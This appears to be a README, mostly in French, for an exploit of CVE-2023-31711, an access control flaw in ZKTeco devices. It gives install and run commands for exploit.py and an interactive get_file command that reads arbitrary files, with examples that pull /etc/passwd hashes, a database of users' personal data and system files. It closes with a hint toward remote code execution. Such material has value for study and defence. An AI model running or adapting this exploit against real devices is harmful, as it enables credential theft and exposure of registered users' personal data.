CVE-2023-31711
Contrôle d'accès incorrect dans ZKTECO permettant aux attaquants distants de lire n'importe quel fichier via l'API administrative.
Installation des modules requis
- Dans le répertoire ZKTEco :
$ pip install -r ./pyzatt/requirements_dev.txt
Exécution de l'exploit
- Dans le répertoire ZKTEco :
$ python exploit.py <ip_address>
Connected to 10.0.2.25
(Cmd) get_file <file_name>
Examples:
get_file /etc/passwd: Disclosed root password's hash
get_file /mnt/mtdblock/data/ZKDB.db: Disclosed PII of registered users. To read the contents, you might need to run this command sequentially as many times till the whole contents
get disclosed
get_file /mnt/mtdblock/data/ZKSystem.db: Disclosed sensitive information related to the system
Crédits
Remarque
Les appareils pourraient également être potentiellement vulnérables à une exécution de code à distance via l'utilisation de l'API administrative. L'exploit mentionné dans la section crédits pourrait être un bon point de départ pour y trouver un test.